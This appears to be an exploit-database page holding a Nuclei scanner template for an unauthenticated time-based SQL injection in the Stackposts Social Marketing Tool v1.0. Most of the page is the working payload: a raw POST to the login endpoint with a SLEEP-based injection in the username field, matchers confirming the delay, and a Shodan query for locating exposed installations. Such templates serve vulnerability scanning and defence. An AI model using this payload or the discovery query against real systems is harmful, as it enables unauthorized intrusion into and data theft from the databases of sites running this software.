stackposts-sqli: Stackposts Social Marketing Tool v1.0 - SQL Injection

2025-08-01 Stackposts Social Marketing Tool PoC Public

Description

SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.

PoC

id: stackposts-sqli

info:
  name: Stackposts Social Marketing Tool v1.0 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
  reference:
    - https://www.exploit-db.com/exploits/51473
    - https://vulners.com/zdt/1337DAY-ID-38725
    - https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
  classification:
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"stackposts"
  tags: time-based-sqli,sqli,unauth,stackposts,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST /spre/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=1')AND (SELECT 9595 FROM (SELECT(SLEEP(7)))YRMM) AND ('gaNg'='gaNg&password=test

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "account you entered")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100cdb8e465fe37fbd9d7be4660af720464692724688ca343518cdabe9f6545e62b0220141d48c1133b36c00aed7e8a8e7e038cac325dce9abf9dc676157797972a5c31:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities